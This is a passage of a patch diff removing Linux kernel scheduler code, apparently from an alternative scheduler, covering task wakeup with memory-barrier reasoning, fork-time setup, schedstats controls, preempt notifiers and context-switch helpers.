-+ *
-+ * Return: %true if @p->state changes (an actual wakeup was done),
-+ *	   %false otherwise.
-+ */
-+static int try_to_wake_up(struct task_struct *p, unsigned int state,
-+			  int wake_flags)
-+{
-+	unsigned long flags;
-+	int cpu, success = 0;
-+
-+	preempt_disable();
-+	if (p == current) {
-+		/*
-+		 * We're waking current, this means 'p->on_rq' and 'task_cpu(p)
-+		 * == smp_processor_id()'. Together this means we can special
-+		 * case the whole 'p->on_rq && ttwu_runnable()' case below
-+		 * without taking any locks.
-+		 *
-+		 * In particular:
-+		 *  - we rely on Program-Order guarantees for all the ordering,
-+		 *  - we're serialized against set_special_state() by virtue of
-+		 *    it disabling IRQs (this allows not taking ->pi_lock).
-+		 */
-+		if (!ttwu_state_match(p, state, &success))
-+			goto out;
-+
-+		trace_sched_waking(p);
-+		WRITE_ONCE(p->__state, TASK_RUNNING);
-+		trace_sched_wakeup(p);
-+		goto out;
-+	}
-+
-+	/*
-+	 * If we are going to wake up a thread waiting for CONDITION we
-+	 * need to ensure that CONDITION=1 done by the caller can not be
-+	 * reordered with p->state check below. This pairs with smp_store_mb()
-+	 * in set_current_state() that the waiting thread does.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	smp_mb__after_spinlock();
-+	if (!ttwu_state_match(p, state, &success))
-+		goto unlock;
-+
-+	trace_sched_waking(p);
-+
-+	/*
-+	 * Ensure we load p->on_rq _after_ p->state, otherwise it would
-+	 * be possible to, falsely, observe p->on_rq == 0 and get stuck
-+	 * in smp_cond_load_acquire() below.
-+	 *
-+	 * sched_ttwu_pending()			try_to_wake_up()
-+	 *   STORE p->on_rq = 1			  LOAD p->state
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * __schedule() (switch to task 'p')
-+	 *   LOCK rq->lock			  smp_rmb();
-+	 *   smp_mb__after_spinlock();
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * [task p]
-+	 *   STORE p->state = UNINTERRUPTIBLE	  LOAD p->on_rq
-+	 *
-+	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
-+	 * __schedule().  See the comment for smp_mb__after_spinlock().
-+	 *
-+	 * A similar smb_rmb() lives in try_invoke_on_locked_down_task().
-+	 */
-+	smp_rmb();
-+	if (READ_ONCE(p->on_rq) && ttwu_runnable(p, wake_flags))
-+		goto unlock;
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * Ensure we load p->on_cpu _after_ p->on_rq, otherwise it would be
-+	 * possible to, falsely, observe p->on_cpu == 0.
-+	 *
-+	 * One must be running (->on_cpu == 1) in order to remove oneself
-+	 * from the runqueue.
-+	 *
-+	 * __schedule() (switch to task 'p')	try_to_wake_up()
-+	 *   STORE p->on_cpu = 1		  LOAD p->on_rq
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * __schedule() (put 'p' to sleep)
-+	 *   LOCK rq->lock			  smp_rmb();
-+	 *   smp_mb__after_spinlock();
-+	 *   STORE p->on_rq = 0			  LOAD p->on_cpu
-+	 *
-+	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
-+	 * __schedule().  See the comment for smp_mb__after_spinlock().
-+	 *
-+	 * Form a control-dep-acquire with p->on_rq == 0 above, to ensure
-+	 * schedule()'s deactivate_task() has 'happened' and p will no longer
-+	 * care about it's own p->state. See the comment in __schedule().
-+	 */
-+	smp_acquire__after_ctrl_dep();
-+
-+	/*
-+	 * We're doing the wakeup (@success == 1), they did a dequeue (p->on_rq
-+	 * == 0), which means we need to do an enqueue, change p->state to
-+	 * TASK_WAKING such that we can unlock p->pi_lock before doing the
-+	 * enqueue, such as ttwu_queue_wakelist().
-+	 */
-+	WRITE_ONCE(p->__state, TASK_WAKING);
-+
-+	/*
-+	 * If the owning (remote) CPU is still in the middle of schedule() with
-+	 * this task as prev, considering queueing p on the remote CPUs wake_list
-+	 * which potentially sends an IPI instead of spinning on p->on_cpu to
-+	 * let the waker make forward progress. This is safe because IRQs are
-+	 * disabled and the IPI will deliver after on_cpu is cleared.
-+	 *
-+	 * Ensure we load task_cpu(p) after p->on_cpu:
-+	 *
-+	 * set_task_cpu(p, cpu);
-+	 *   STORE p->cpu = @cpu
-+	 * __schedule() (switch to task 'p')
-+	 *   LOCK rq->lock
-+	 *   smp_mb__after_spin_lock()          smp_cond_load_acquire(&p->on_cpu)
-+	 *   STORE p->on_cpu = 1                LOAD p->cpu
-+	 *
-+	 * to ensure we observe the correct CPU on which the task is currently
-+	 * scheduling.
-+	 */
-+	if (smp_load_acquire(&p->on_cpu) &&
-+	    ttwu_queue_wakelist(p, task_cpu(p), wake_flags))
-+		goto unlock;
-+
-+	/*
-+	 * If the owning (remote) CPU is still in the middle of schedule() with
-+	 * this task as prev, wait until it's done referencing the task.
-+	 *
-+	 * Pairs with the smp_store_release() in finish_task().
-+	 *
-+	 * This ensures that tasks getting woken will be fully ordered against
-+	 * their previous state and preserve Program Order.
-+	 */
-+	smp_cond_load_acquire(&p->on_cpu, !VAL);
-+
-+	sched_task_ttwu(p);
-+
-+	cpu = select_task_rq(p);
-+
-+	if (cpu != task_cpu(p)) {
-+		if (p->in_iowait) {
-+			delayacct_blkio_end(p);
-+			atomic_dec(&task_rq(p)->nr_iowait);
-+		}
-+
-+		wake_flags |= WF_MIGRATED;
-+		psi_ttwu_dequeue(p);
-+		set_task_cpu(p, cpu);
-+	}
-+#else
-+	cpu = task_cpu(p);
-+#endif /* CONFIG_SMP */
-+
-+	ttwu_queue(p, cpu, wake_flags);
-+unlock:
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+out:
-+	if (success)
-+		ttwu_stat(p, task_cpu(p), wake_flags);
-+	preempt_enable();
-+
-+	return success;
-+}
-+
-+static bool __task_needs_rq_lock(struct task_struct *p)
-+{
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/*
-+	 * Since pi->lock blocks try_to_wake_up(), we don't need rq->lock when
-+	 * the task is blocked. Make sure to check @state since ttwu() can drop
-+	 * locks at the end, see ttwu_queue_wakelist().
-+	 */
-+	if (state == TASK_RUNNING || state == TASK_WAKING)
-+		return true;
-+
-+	/*
-+	 * Ensure we load p->on_rq after p->__state, otherwise it would be
-+	 * possible to, falsely, observe p->on_rq == 0.
-+	 *
-+	 * See try_to_wake_up() for a longer comment.
-+	 */
-+	smp_rmb();
-+	if (p->on_rq)
-+		return true;
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * Ensure the task has finished __schedule() and will not be referenced
-+	 * anymore. Again, see try_to_wake_up() for a longer comment.
-+	 */
-+	smp_rmb();
-+	smp_cond_load_acquire(&p->on_cpu, !VAL);
-+#endif
-+
-+	return false;
-+}
-+
-+/**
-+ * task_call_func - Invoke a function on task in fixed state
-+ * @p: Process for which the function is to be invoked, can be @current.
-+ * @func: Function to invoke.
-+ * @arg: Argument to function.
-+ *
-+ * Fix the task in it's current state by avoiding wakeups and or rq operations
-+ * and call @func(@arg) on it.  This function can use ->on_rq and task_curr()
-+ * to work out what the state is, if required.  Given that @func can be invoked
-+ * with a runqueue lock held, it had better be quite lightweight.
-+ *
-+ * Returns:
-+ *   Whatever @func returns
-+ */
-+int task_call_func(struct task_struct *p, task_call_f func, void *arg)
-+{
-+	struct rq *rq = NULL;
-+	struct rq_flags rf;
-+	int ret;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, rf.flags);
-+
-+	if (__task_needs_rq_lock(p))
-+		rq = __task_rq_lock(p, &rf);
-+
-+	/*
-+	 * At this point the task is pinned; either:
-+	 *  - blocked and we're holding off wakeups      (pi->lock)
-+	 *  - woken, and we're holding off enqueue       (rq->lock)
-+	 *  - queued, and we're holding off schedule     (rq->lock)
-+	 *  - running, and we're holding off de-schedule (rq->lock)
-+	 *
-+	 * The called function (@func) can use: task_curr(), p->on_rq and
-+	 * p->__state to differentiate between these states.
-+	 */
-+	ret = func(p, arg);
-+
-+	if (rq)
-+		__task_rq_unlock(rq, &rf);
-+
-+	raw_spin_unlock_irqrestore(&p->pi_lock, rf.flags);
-+	return ret;
-+}
-+
-+/**
-+ * cpu_curr_snapshot - Return a snapshot of the currently running task
-+ * @cpu: The CPU on which to snapshot the task.
-+ *
-+ * Returns the task_struct pointer of the task "currently" running on
-+ * the specified CPU.  If the same task is running on that CPU throughout,
-+ * the return value will be a pointer to that task's task_struct structure.
-+ * If the CPU did any context switches even vaguely concurrently with the
-+ * execution of this function, the return value will be a pointer to the
-+ * task_struct structure of a randomly chosen task that was running on
-+ * that CPU somewhere around the time that this function was executing.
-+ *
-+ * If the specified CPU was offline, the return value is whatever it
-+ * is, perhaps a pointer to the task_struct structure of that CPU's idle
-+ * task, but there is no guarantee.  Callers wishing a useful return
-+ * value must take some action to ensure that the specified CPU remains
-+ * online throughout.
-+ *
-+ * This function executes full memory barriers before and after fetching
-+ * the pointer, which permits the caller to confine this function's fetch
-+ * with respect to the caller's accesses to other shared variables.
-+ */
-+struct task_struct *cpu_curr_snapshot(int cpu)
-+{
-+	struct task_struct *t;
-+
-+	smp_mb(); /* Pairing determined by caller's synchronization design. */
-+	t = rcu_dereference(cpu_curr(cpu));
-+	smp_mb(); /* Pairing determined by caller's synchronization design. */
-+	return t;
-+}
-+
-+/**
-+ * wake_up_process - Wake up a specific process
-+ * @p: The process to be woken up.
-+ *
-+ * Attempt to wake up the nominated process and move it to the set of runnable
-+ * processes.
-+ *
-+ * Return: 1 if the process was woken up, 0 if it was already running.
-+ *
-+ * This function executes a full memory barrier before accessing the task state.
-+ */
-+int wake_up_process(struct task_struct *p)
-+{
-+	return try_to_wake_up(p, TASK_NORMAL, 0);
-+}
-+EXPORT_SYMBOL(wake_up_process);
-+
-+int wake_up_state(struct task_struct *p, unsigned int state)
-+{
-+	return try_to_wake_up(p, state, 0);
-+}
-+
-+/*
-+ * Perform scheduler related setup for a newly forked process p.
-+ * p is forked by current.
-+ *
-+ * __sched_fork() is basic setup used by init_idle() too:
-+ */
-+static inline void __sched_fork(unsigned long clone_flags, struct task_struct *p)
-+{
-+	p->on_rq			= 0;
-+	p->on_cpu			= 0;
-+	p->utime			= 0;
-+	p->stime			= 0;
-+	p->sched_time			= 0;
-+
-+#ifdef CONFIG_SCHEDSTATS
-+	/* Even if schedstat is disabled, there should not be garbage */
-+	memset(&p->stats, 0, sizeof(p->stats));
-+#endif
-+
-+#ifdef CONFIG_PREEMPT_NOTIFIERS
-+	INIT_HLIST_HEAD(&p->preempt_notifiers);
-+#endif
-+
-+#ifdef CONFIG_COMPACTION
-+	p->capture_control = NULL;
-+#endif
-+#ifdef CONFIG_SMP
-+	p->wake_entry.u_flags = CSD_TYPE_TTWU;
-+#endif
-+}
-+
-+/*
-+ * fork()/clone()-time setup:
-+ */
-+int sched_fork(unsigned long clone_flags, struct task_struct *p)
-+{
-+	__sched_fork(clone_flags, p);
-+	/*
-+	 * We mark the process as NEW here. This guarantees that
-+	 * nobody will actually run it, and a signal or other external
-+	 * event cannot wake it up and insert it on the runqueue either.
-+	 */
-+	p->__state = TASK_NEW;
-+
-+	/*
-+	 * Make sure we do not leak PI boosting priority to the child.
-+	 */
-+	p->prio = current->normal_prio;
-+
-+	/*
-+	 * Revert to default priority/policy on fork if requested.
-+	 */
-+	if (unlikely(p->sched_reset_on_fork)) {
-+		if (task_has_rt_policy(p)) {
-+			p->policy = SCHED_NORMAL;
-+			p->static_prio = NICE_TO_PRIO(0);
-+			p->rt_priority = 0;
-+		} else if (PRIO_TO_NICE(p->static_prio) < 0)
-+			p->static_prio = NICE_TO_PRIO(0);
-+
-+		p->prio = p->normal_prio = p->static_prio;
-+
-+		/*
-+		 * We don't need the reset flag anymore after the fork. It has
-+		 * fulfilled its duty:
-+		 */
-+		p->sched_reset_on_fork = 0;
-+	}
-+
-+#ifdef CONFIG_SCHED_INFO
-+	if (unlikely(sched_info_on()))
-+		memset(&p->sched_info, 0, sizeof(p->sched_info));
-+#endif
-+	init_task_preempt_count(p);
-+
-+	return 0;
-+}
-+
-+void sched_cgroup_fork(struct task_struct *p, struct kernel_clone_args *kargs)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+
-+	/*
-+	 * Because we're not yet on the pid-hash, p->pi_lock isn't strictly
-+	 * required yet, but lockdep gets upset if rules are violated.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	/*
-+	 * Share the timeslice between parent and child, thus the
-+	 * total amount of pending timeslices in the system doesn't change,
-+	 * resulting in more scheduling fairness.
-+	 */
-+	rq = this_rq();
-+	raw_spin_lock(&rq->lock);
-+
-+	rq->curr->time_slice /= 2;
-+	p->time_slice = rq->curr->time_slice;
-+#ifdef CONFIG_SCHED_HRTICK
-+	hrtick_start(rq, rq->curr->time_slice);
-+#endif
-+
-+	if (p->time_slice < RESCHED_NS) {
-+		p->time_slice = sched_timeslice_ns;
-+		resched_curr(rq);
-+	}
-+	sched_task_fork(p, rq);
-+	raw_spin_unlock(&rq->lock);
-+
-+	rseq_migrate(p);
-+	/*
-+	 * We're setting the CPU for the first time, we don't migrate,
-+	 * so use __set_task_cpu().
-+	 */
-+	__set_task_cpu(p, smp_processor_id());
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+
-+void sched_post_fork(struct task_struct *p)
-+{
-+}
-+
-+#ifdef CONFIG_SCHEDSTATS
-+
-+DEFINE_STATIC_KEY_FALSE(sched_schedstats);
-+
-+static void set_schedstats(bool enabled)
-+{
-+	if (enabled)
-+		static_branch_enable(&sched_schedstats);
-+	else
-+		static_branch_disable(&sched_schedstats);
-+}
-+
-+void force_schedstat_enabled(void)
-+{
-+	if (!schedstat_enabled()) {
-+		pr_info("kernel profiling enabled schedstats, disable via kernel.sched_schedstats.\n");
-+		static_branch_enable(&sched_schedstats);
-+	}
-+}
-+
-+static int __init setup_schedstats(char *str)
-+{
-+	int ret = 0;
-+	if (!str)
-+		goto out;
-+
-+	if (!strcmp(str, "enable")) {
-+		set_schedstats(true);
-+		ret = 1;
-+	} else if (!strcmp(str, "disable")) {
-+		set_schedstats(false);
-+		ret = 1;
-+	}
-+out:
-+	if (!ret)
-+		pr_warn("Unable to parse schedstats=\n");
-+
-+	return ret;
-+}
-+__setup("schedstats=", setup_schedstats);
-+
-+#ifdef CONFIG_PROC_SYSCTL
-+static int sysctl_schedstats(struct ctl_table *table, int write, void *buffer,
-+		size_t *lenp, loff_t *ppos)
-+{
-+	struct ctl_table t;
-+	int err;
-+	int state = static_branch_likely(&sched_schedstats);
-+
-+	if (write && !capable(CAP_SYS_ADMIN))
-+		return -EPERM;
-+
-+	t = *table;
-+	t.data = &state;
-+	err = proc_dointvec_minmax(&t, write, buffer, lenp, ppos);
-+	if (err < 0)
-+		return err;
-+	if (write)
-+		set_schedstats(state);
-+	return err;
-+}
-+
-+static struct ctl_table sched_core_sysctls[] = {
-+	{
-+		.procname       = "sched_schedstats",
-+		.data           = NULL,
-+		.maxlen         = sizeof(unsigned int),
-+		.mode           = 0644,
-+		.proc_handler   = sysctl_schedstats,
-+		.extra1         = SYSCTL_ZERO,
-+		.extra2         = SYSCTL_ONE,
-+	},
-+	{}
-+};
-+static int __init sched_core_sysctl_init(void)
-+{
-+	register_sysctl_init("kernel", sched_core_sysctls);
-+	return 0;
-+}
-+late_initcall(sched_core_sysctl_init);
-+#endif /* CONFIG_PROC_SYSCTL */
-+#endif /* CONFIG_SCHEDSTATS */
-+
-+/*
-+ * wake_up_new_task - wake up a newly created task for the first time.
-+ *
-+ * This function will do some initial scheduler statistics housekeeping
-+ * that must be done for every newly created context, then puts the task
-+ * on the runqueue and wakes it.
-+ */
-+void wake_up_new_task(struct task_struct *p)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	WRITE_ONCE(p->__state, TASK_RUNNING);
-+	rq = cpu_rq(select_task_rq(p));
-+#ifdef CONFIG_SMP
-+	rseq_migrate(p);
-+	/*
-+	 * Fork balancing, do it here and not earlier because:
-+	 * - cpus_ptr can change in the fork path
-+	 * - any previously selected CPU might disappear through hotplug
-+	 *
-+	 * Use __set_task_cpu() to avoid calling sched_class::migrate_task_rq,
-+	 * as we're not fully set-up yet.
-+	 */
-+	__set_task_cpu(p, cpu_of(rq));
-+#endif
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+
-+	activate_task(p, rq);
-+	trace_sched_wakeup_new(p);
-+	check_preempt_curr(rq);
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+
-+#ifdef CONFIG_PREEMPT_NOTIFIERS
-+
-+static DEFINE_STATIC_KEY_FALSE(preempt_notifier_key);
-+
-+void preempt_notifier_inc(void)
-+{
-+	static_branch_inc(&preempt_notifier_key);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_inc);
-+
-+void preempt_notifier_dec(void)
-+{
-+	static_branch_dec(&preempt_notifier_key);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_dec);
-+
-+/**
-+ * preempt_notifier_register - tell me when current is being preempted & rescheduled
-+ * @notifier: notifier struct to register
-+ */
-+void preempt_notifier_register(struct preempt_notifier *notifier)
-+{
-+	if (!static_branch_unlikely(&preempt_notifier_key))
-+		WARN(1, "registering preempt_notifier while notifiers disabled\n");
-+
-+	hlist_add_head(&notifier->link, &current->preempt_notifiers);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_register);
-+
-+/**
-+ * preempt_notifier_unregister - no longer interested in preemption notifications
-+ * @notifier: notifier struct to unregister
-+ *
-+ * This is *not* safe to call from within a preemption notifier.
-+ */
-+void preempt_notifier_unregister(struct preempt_notifier *notifier)
-+{
-+	hlist_del(&notifier->link);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_unregister);
-+
-+static void __fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+	struct preempt_notifier *notifier;
-+
-+	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
-+		notifier->ops->sched_in(notifier, raw_smp_processor_id());
-+}
-+
-+static __always_inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+	if (static_branch_unlikely(&preempt_notifier_key))
-+		__fire_sched_in_preempt_notifiers(curr);
-+}
-+
-+static void
-+__fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				   struct task_struct *next)
-+{
-+	struct preempt_notifier *notifier;
-+
-+	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
-+		notifier->ops->sched_out(notifier, next);
-+}
-+
-+static __always_inline void
-+fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				 struct task_struct *next)
-+{
-+	if (static_branch_unlikely(&preempt_notifier_key))
-+		__fire_sched_out_preempt_notifiers(curr, next);
-+}
-+
-+#else /* !CONFIG_PREEMPT_NOTIFIERS */
-+
-+static inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+}
-+
-+static inline void
-+fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				 struct task_struct *next)
-+{
-+}
-+
-+#endif /* CONFIG_PREEMPT_NOTIFIERS */
-+
-+static inline void prepare_task(struct task_struct *next)
-+{
-+	/*
-+	 * Claim the task as running, we do this before switching to it
-+	 * such that any running task will have this set.
-+	 *
-+	 * See the smp_load_acquire(&p->on_cpu) case in ttwu() and
-+	 * its ordering comment.
-+	 */
-+	WRITE_ONCE(next->on_cpu, 1);
-+}
-+
-+static inline void finish_task(struct task_struct *prev)
-+{
-+#ifdef CONFIG_SMP
-+	/*
-+	 * This must be the very last reference to @prev from this CPU. After
-+	 * p->on_cpu is cleared, the task can be moved to a different CPU. We
-+	 * must ensure this doesn't happen until the switch is completely
-+	 * finished.
-+	 *
-+	 * In particular, the load of prev->state in finish_task_switch() must
-+	 * happen before this.
-+	 *
-+	 * Pairs with the smp_cond_load_acquire() in try_to_wake_up().
-+	 */
-+	smp_store_release(&prev->on_cpu, 0);
-+#else
-+	prev->on_cpu = 0;
-+#endif
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+static void do_balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+	void (*func)(struct rq *rq);
-+	struct balance_callback *next;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	while (head) {
-+		func = (void (*)(struct rq *))head->func;
-+		next = head->next;
-+		head->next = NULL;
-+		head = next;
-+
-+		func(rq);
-+	}
-+}
-+
-+static void balance_push(struct rq *rq);
-+
-+/*
-+ * balance_push_callback is a right abuse of the callback interface and plays
-+ * by significantly different rules.
-+ *
-+ * Where the normal balance_callback's purpose is to be ran in the same context
-+ * that queued it (only later, when it's safe to drop rq->lock again),
-+ * balance_push_callback is specifically targeted at __schedule().
-+ *
-+ * This abuse is tolerated because it places all the unlikely/odd cases behind
-+ * a single test, namely: rq->balance_callback == NULL.
-+ */
-+struct balance_callback balance_push_callback = {
-+	.next = NULL,
-+	.func = balance_push,
-+};
-+
-+static inline struct balance_callback *
-+__splice_balance_callbacks(struct rq *rq, bool split)
-+{
-+	struct balance_callback *head = rq->balance_callback;
-+
-+	if (likely(!head))
-+		return NULL;
-+
-+	lockdep_assert_rq_held(rq);
-+	/*
-+	 * Must not take balance_push_callback off the list when
-+	 * splice_balance_callbacks() and balance_callbacks() are not
-+	 * in the same rq->lock section.
-+	 *
-+	 * In that case it would be possible for __schedule() to interleave
-+	 * and observe the list empty.
-+	 */
-+	if (split && head == &balance_push_callback)
-+		head = NULL;
-+	else
-+		rq->balance_callback = NULL;
-+
-+	return head;
-+}
-+
-+static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
-+{
-+	return __splice_balance_callbacks(rq, true);
-+}
-+
-+static void __balance_callbacks(struct rq *rq)
-+{
-+	do_balance_callbacks(rq, __splice_balance_callbacks(rq, false));
-+}
-+
-+static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+	unsigned long flags;
-+
-+	if (unlikely(head)) {
-+		raw_spin_lock_irqsave(&rq->lock, flags);
-+		do_balance_callbacks(rq, head);
-+		raw_spin_unlock_irqrestore(&rq->lock, flags);
-+	}
-+}
-+
-+#else
-+
-+static inline void __balance_callbacks(struct rq *rq)
-+{
-+}
-+
-+static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
-+{
-+	return NULL;
-+}
-+
-+static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+}
-+
-+#endif
-+
-+static inline void
-+prepare_lock_switch(struct rq *rq, struct task_struct *next)
-+{
-+	/*
-+	 * Since the runqueue lock will be released by the next
-+	 * task (which is an invalid locking op but in the case
-+	 * of the scheduler it's an obvious special-case), so we
-+	 * do an early lockdep release here:
-+	 */
-+	spin_release(&rq->lock.dep_map, _THIS_IP_);
-+#ifdef CONFIG_DEBUG_SPINLOCK
-+	/* this is a valid case when another task releases the spinlock */
-+	rq->lock.owner = next;
-+#endif
-+}
-+
-+static inline void finish_lock_switch(struct rq *rq)
-+{
-+	/*
-+	 * If we are tracking spinlock dependencies then we have to
-+	 * fix up the runqueue lock - which gets 'carried over' from
-+	 * prev into current:
-+	 */
-+	spin_acquire(&rq->lock.dep_map, 0, 0, _THIS_IP_);
-+	__balance_callbacks(rq);
-+	raw_spin_unlock_irq(&rq->lock);
-+}
-+
-+/*
-+ * NOP if the arch has not defined these:
-+ */
-+
-+#ifndef prepare_arch_switch
-+# define prepare_arch_switch(next)	do { } while (0)
-+#endif
-+
-+#ifndef finish_arch_post_lock_switch
-+# define finish_arch_post_lock_switch()	do { } while (0)
-+#endif
-+
-+static inline void kmap_local_sched_out(void)
-+{
-+#ifdef CONFIG_KMAP_LOCAL
-+	if (unlikely(current->kmap_ctrl.idx))
-+		__kmap_local_sched_out();
-+#endif
-+}
-+
-+static inline void kmap_local_sched_in(void)
-+{
-+#ifdef CONFIG_KMAP_LOCAL
-+	if (unlikely(current->kmap_ctrl.idx))
-+		__kmap_local_sched_in();
-+#endif
-+}
-+
-+/**
-+ * prepare_task_switch - prepare to switch tasks
-+ * @rq: the runqueue preparing to switch
-+ * @next: the task we are going to switch to.
-+ *
-+ * This is called with the rq lock held and interrupts off. It must
-+ * be paired with a subsequent finish_task_switch after the context
-+ * switch.
-+ *
-+ * prepare_task_switch sets up locking and calls architecture specific
-+ * hooks.
-+ */
-+static inline void
-+prepare_task_switch(struct rq *rq, struct task_struct *prev,
-+		    struct task_struct *next)
-+{
-+	kcov_prepare_switch(prev);
-+	sched_info_switch(rq, prev, next);
-+	perf_event_task_sched_out(prev, next);
-+	rseq_preempt(prev);
-+	fire_sched_out_preempt_notifiers(prev, next);
-+	kmap_local_sched_out();
-+	prepare_task(next);
-+	prepare_arch_switch(next);
-+}
-+
-+/**
-+ * finish_task_switch - clean up after a task-switch
-+ * @rq: runqueue associated with task-switch
-+ * @prev: the thread we just switched away from.
-+ *
-+ * finish_task_switch must be called after the context switch, paired
-+ * with a prepare_task_switch call before the context switch.
-+ * finish_task_switch will reconcile locking set up by prepare_task_switch,
-+ * and do any other architecture-specific cleanup actions.
-+ *
-+ * Note that we may have delayed dropping an mm in context_switch(). If
-+ * so, we finish that here outside of the runqueue lock.  (Doing it
-+ * with the lock held can cause deadlocks; see schedule() for
-+ * details.)
-+ *
-+ * The context switch have flipped the stack from under us and restored the
-+ * local variables which were saved when this task called schedule() in the
-+ * past. prev == current is still correct but we need to recalculate this_rq
-+ * because prev may have moved to another CPU.
-+ */
-+static struct rq *finish_task_switch(struct task_struct *prev)
-+	__releases(rq->lock)
-+{
-+	struct rq *rq = this_rq();
-+	struct mm_struct *mm = rq->prev_mm;
-+	unsigned int prev_state;
-+
-+	/*
-+	 * The previous task will have left us with a preempt_count of 2
-+	 * because it left us after:
-+	 *
-+	 *	schedule()
-+	 *	  preempt_disable();			// 1
-+	 *	  __schedule()
-+	 *	    raw_spin_lock_irq(&rq->lock)	// 2
-+	 *
-+	 * Also, see FORK_PREEMPT_COUNT.
-+	 */
-+	if (WARN_ONCE(preempt_count() != 2*PREEMPT_DISABLE_OFFSET,
-+		      "corrupted preempt_count: %s/%d/0x%x\n",
-+		      current->comm, current->pid, preempt_count()))
-+		preempt_count_set(FORK_PREEMPT_COUNT);
-+
-+	rq->prev_mm = NULL;
-+
-+	/*
-+	 * A task struct has one reference for the use as "current".
-+	 * If a task dies, then it sets TASK_DEAD in tsk->state and calls
-+	 * schedule one last time. The schedule call will never return, and
-+	 * the scheduled task must drop that reference.
-+	 *
-+	 * We must observe prev->state before clearing prev->on_cpu (in
-+	 * finish_task), otherwise a concurrent wakeup can get prev
-+	 * running on another CPU and we could rave with its RUNNING -> DEAD
-+	 * transition, resulting in a double drop.
-+	 */
-+	prev_state = READ_ONCE(prev->__state);
-+	vtime_task_switch(prev);
-+	perf_event_task_sched_in(prev, current);
-+	finish_task(prev);
-+	tick_nohz_task_switch();
-+	finish_lock_switch(rq);
-+	finish_arch_post_lock_switch();
-+	kcov_finish_switch(current);
-+	/*
-+	 * kmap_local_sched_out() is invoked with rq::lock held and
-+	 * interrupts disabled. There is no requirement for that, but the
-+	 * sched out code does not have an interrupt enabled section.
-+	 * Restoring the maps on sched in does not require interrupts being
-+	 * disabled either.
-+	 */
-+	kmap_local_sched_in();
-+
-+	fire_sched_in_preempt_notifiers(current);
-+	/*
-+	 * When switching through a kernel thread, the loop in
-+	 * membarrier_{private,global}_expedited() may have observed that
-+	 * kernel thread and not issued an IPI. It is therefore possible to
-+	 * schedule between user->kernel->user threads without passing though
-+	 * switch_mm(). Membarrier requires a barrier after storing to
-+	 * rq->curr, before returning to userspace, so provide them here:
-+	 *
-+	 * - a full memory barrier for {PRIVATE,GLOBAL}_EXPEDITED, implicitly
-+	 *   provided by mmdrop(),
-+	 * - a sync_core for SYNC_CORE.
-+	 */
-+	if (mm) {
-+		membarrier_mm_sync_core_before_usermode(mm);
-+		mmdrop_sched(mm);
-+	}
-+	if (unlikely(prev_state == TASK_DEAD)) {
-+		/* Task is done with its stack. */
-+		put_task_stack(prev);
-+
-+		put_task_struct_rcu_user(prev);
-+	}
-+
-+	return rq;
-+}
-+
-+/**
-+ * schedule_tail - first thing a freshly forked thread must call.
-+ * @prev: the thread we just switched away from.
-+ */
-+asmlinkage __visible void schedule_tail(struct task_struct *prev)
-+	__releases(rq->lock)
-+{
-+	/*
-+	 * New tasks start with FORK_PREEMPT_COUNT, see there and
-+	 * finish_task_switch() for details.
-+	 *
-+	 * finish_task_switch() will drop rq->lock() and lower preempt_count
-+	 * and the preempt_enable() will end up enabling preemption (on
-+	 * PREEMPT_COUNT kernels).
-+	 */
-+
-+	finish_task_switch(prev);
-+	preempt_enable();
-+
-+	if (current->set_child_tid)
-+		put_user(task_pid_vnr(current), current->set_child_tid);
-+
-+	calculate_sigpending();
-+}
-+
-+/*
-+ * context_switch - switch to the new MM and the new thread's register state.
-+ */
-+static __always_inline struct rq *
-+context_switch(struct rq *rq, struct task_struct *prev,
-+	       struct task_struct *next)
-+{
-+	prepare_task_switch(rq, prev, next);
-+
-+	/*
-+	 * For paravirt, this is coupled with an exit in switch_to to
-+	 * combine the page table reload and the switch backend into
-+	 * one hypercall.
-+	 */
-+	arch_start_context_switch(prev);
-+
-+	/*
-+	 * kernel -> kernel   lazy + transfer active
-+	 *   user -> kernel   lazy + mmgrab() active
-+	 *
-+	 * kernel ->   user   switch + mmdrop() active
-+	 *   user ->   user   switch
-+	 */
-+	if (!next->mm) {                                // to kernel
-+		enter_lazy_tlb(prev->active_mm, next);
-+
-+		next->active_mm = prev->active_mm;
-+		if (prev->mm)                           // from user
-+			mmgrab(prev->active_mm);
-+		else
-+			prev->active_mm = NULL;
-+	} else {                                        // to user
-+		membarrier_switch_mm(rq, prev->active_mm, next->mm);
-+		/*
